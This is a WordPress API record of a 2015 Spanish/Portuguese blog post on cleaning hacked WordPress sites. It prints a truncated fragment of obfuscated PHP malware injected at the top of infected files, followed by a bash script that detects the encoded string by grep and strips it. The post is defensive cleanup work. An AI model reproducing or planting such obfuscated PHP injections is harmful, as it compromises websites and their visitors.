{"id":3300,"date":"2015-03-07T02:17:07","date_gmt":"2015-03-07T02:17:07","guid":{"rendered":"http:\/\/www.deuzebranaweb.com.br\/?p=3300"},"modified":"2015-03-07T02:17:07","modified_gmt":"2015-03-07T02:17:07","slug":"wordpess-hackeado","status":"publish","type":"post","link":"https:\/\/blog.deuzebranaweb.com.br\/index.php\/2015\/03\/07\/wordpess-hackeado\/","title":{"rendered":"wordpess hackeado???"},"content":{"rendered":"

Todos los ficheros PHP de WordPress tienen en la primera linea una linea extra\u00f1a<\/strong>, similar a:<\/p>\n

...if(!isset($GLOBALS[\"\\x61\\156\\x75\\156\\x61\"])) { $ua=strtolower($_SERVER[\"\\x48\\124\\x54\\120\\x5f\\125\\x53\\105\\x52\\137\\x41\\107\\x45\\116\\x54\"]); if ((! strstr($ua,\"\\x6d\\163\\x69\\145\")) and (! strstr($ua,\"\\x72\\166\\x3a\\61\\x31\"))) $GLOBALS[\"\\x61\\156\\x75\\156\\x61\"]=1; } ?><?php $bqrdwxkbia = '2f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x78277878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x782:5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSV5c%x78257-K)fujs%x5c%x78#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%m%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x7825-#1GO%x5c%x7x5c%x787f_*#[k2%x5c%x785c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnb160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%1627825h>#]y31]278]y3e]81]K78:56985:6197g:756<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFHfgg($n){return chr(ord($n)-1);} @error_repo%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf7fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~%x787f_*#ujojRk3%x5c%x7860{666~6%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osx5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x52qj%x5c%x7825)hopm3qjA)4985-rr.93e:5597f-s.973:8297f%57%x65\",\"%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hudovg<~%x5c%x7824<!%x5c%x7825o:!>!5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**mpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bg<!gps)%x5c%x7825j:>1<%x5c%x7825j:x7825j>1<%x5c%x78\\142\\x71\\162\\x64\\167\\x78\\153\\x62\\151\\x61\\51\\x29\\51\\x3b\\40\\x2f\\52\\x20\\144\\x63\\145\\x6b\\142\\x6d\\151\\x7a\\141\\x72\\40\\x2a\\57\\x20\"; $pnzewsvbvw=substr($bqrdwxkbia,(54629-44516),(45-33)); $pnzewsvbvw($wngtpqemdp, $mwgebagebq, NULL); $pnzewsvbvw=$mwgebagebq; $pnzewsvbvw=(506-385); $bqrdwxkbia=$pnzewsvbvw-1;...\n\n\nCorre\u00e7\u00e3o:<\/pre>\n
.\/remove_malware.sh \/var\/www\/wp_path\/<\/pre>\n
Limpiar:<\/p>\n
.\/remove_malware.sh \/var\/www\/wp_path\/ clean<\/pre>\n
Os dejamos a continuaci\u00f3n el script (tambi\u00e9n podeis descargarlo aqu\u00ed<\/a>):<\/p>\n
#!\/bin\/bash\n#\n# This script remove malware of PHP files.\n#\n# In this case it will remove some malicious code\n# from all WordPress PHP files that is at top of\n# every PHP file.\n#\n# The string at the top of every file is:\n#\n# ... if(!isset($GLOBALS[\"\\x61\\156\\x75\\156\\x61\"])) { \n# $ua=strtolower($_SERVER[\"\\x48\\124\\x54\\120\\x5f\\125\\x53\\\n# 105\\x52\\137\\x41\\107\\x45\\116\\x54\"]); if ((! strstr($ua,\n# \"\\x6d\\16 ...\n# \n# (PHP headers, and mostly all of the line, have been \n# removed to avoid anti-virus think the script is a virus)\n#\n# This script tries to find the string inside $_SERVER\n# of the above line at the top of the files to determine\n# if the file is infected. If you run the script and\n# nothing seems to be infected but you suspect and you\n# want to be sure, just open any PHP of WordPress and\n# check if the malicious line code is present. If is\n# present but the script did not detect, it is because\n# the content inside $_SERVER may be diferent.\n# In these cases, just replace in this script the string\n# in the -e parameter of grep line with the content of\n# $_SERVER found in your PHP (remember to escape\n# the \\ with \\\\\\\\) and run again this removal script.\n#\n#\n# JavocSoft 2014\n#\nif [[ -z \"$1\" ]]; then\n echo \"Directory where to find is required.\"\nelse\n grep -rnwl $1 --include \\*.php -e \"\\\\\\\\x48\\\\\\\\124\\\\\\\\x54\\\\\\\\120\\\\\\\\x5f\\\\\\\\125\\\\\\\\x53\\\\\\\\105\\\\\\\\x52\\\\\\\\137\\\\\\\\x41\\\\\\\\107\\\\\\\\x45\\\\\\\\116\\\\\\\\x54\" | while read -r filename ; do\nif [[ ! -z \"$2\" ]]; then\n echo \"Found file $filename. Cleaning...\"\n awk 'BEGIN {matches=0} matches < 1 && \/1\/ { sub(\/^.*<?php\/,\"<?php\"); matches++ } { print $0 }' $filename > $filename.purged\n mv $filename $filename.bck\n mv $filename.purged $filename\n else\n echo \"Found file $filename.\"\n fi\ndone\n echo \"Done.\"\nfi<\/pre>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
http:\/\/javocsoft.es\/archives\/wordpress-hackeado-caso-y-desinfeccion\/945<\/p>\n
 <\/p>\n
 <\/p>\n
programa que causa isso:<\/p>\n
http:\/\/memberdotmy.blogspot.com.br\/2012\/11\/webcruiser-web-vulnerability-scanner.html<\/p>\n
http:\/\/www.janusec.com\/<\/p>\n","protected":false},"excerpt":{"rendered":"
Todos los ficheros PHP de WordPress tienen en la primera linea una linea extra\u00f1a, similar a: …if(!isset($GLOBALS[“\\x61\\156\\x75\\156\\x61”])) { $ua=strtolower($_SERVER[“\\x48\\124\\x54\\120\\x5f\\125\\x53\\105\\x52\\137\\x41\\107\\x45\\116\\x54″]); if ((! strstr($ua,”\\x6d\\163\\x69\\145″)) and (! strstr($ua,”\\x72\\166\\x3a\\61\\x31”))) $GLOBALS[“\\x61\\156\\x75\\156\\x61″]=1; } ?><?php $bqrdwxkbia = ‘2f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x78277878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x782:5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSV5c%x78257-K)fujs%x5c%x78#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%m%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x7825-#1GO%x5c%x7x5c%x787f_*#[k2%x5c%x785c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnb160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%1627825h>#]y31]278]y3e]81]K78:56985:6197g:756<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFHfgg($n){return chr(ord($n)-1);} @error_repo%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf7fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~%x787f_*#ujojRk3%x5c%x7860{666~6%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osx5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x52qj%x5c%x7825)hopm3qjA)4985-rr.93e:5597f-s.973:8297f%57%x65″,”%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hudovg<~%x5c%x7824<!%x5c%x7825o:!>!5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**mpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bg<!gps)%x5c%x7825j:>1<%x5c%x7825j:x7825j>1<%x5c%x78\\142\\x71\\162\\x64\\167\\x78\\153\\x62\\151\\x61\\51\\x29\\51\\x3b\\40\\x2f\\52\\x20\\144\\x63\\145\\x6b\\142\\x6d\\151\\x7a\\141\\x72\\40\\x2a\\57\\x20”; $pnzewsvbvw=substr($bqrdwxkbia,(54629-44516),(45-33)); $pnzewsvbvw($wngtpqemdp, $mwgebagebq, NULL); $pnzewsvbvw=$mwgebagebq; $pnzewsvbvw=(506-385); $bqrdwxkbia=$pnzewsvbvw-1;… Corre\u00e7\u00e3o: .\/remove_malware.sh \/var\/www\/wp_path\/ Limpiar: .\/remove_malware.sh…<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_angie_page":false,"page_builder":"","footnotes":""},"categories":[18,20,19,7],"tags":[],"class_list":["post-3300","post","type-post","status-publish","format-standard","hentry","category-comandos-linux","category-linux","category-whmcapenel","category-wordpress"],"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.deuzebranaweb.com.br\/index.php\/wp-json\/wp\/v2\/posts\/3300","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.deuzebranaweb.com.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.deuzebranaweb.com.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.deuzebranaweb.com.br\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.deuzebranaweb.com.br\/index.php\/wp-json\/wp\/v2\/comments?post=3300"}],"version-history":[{"count":0,"href":"https:\/\/blog.deuzebranaweb.com.br\/index.php\/wp-json\/wp\/v2\/posts\/3300\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.deuzebranaweb.com.br\/index.php\/wp-json\/wp\/v2\/media?parent=3300"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.deuzebranaweb.com.br\/index.php\/wp-json\/wp\/v2\/categories?post=3300"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.deuzebranaweb.com.br\/index.php\/wp-json\/wp\/v2\/tags?post=3300"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}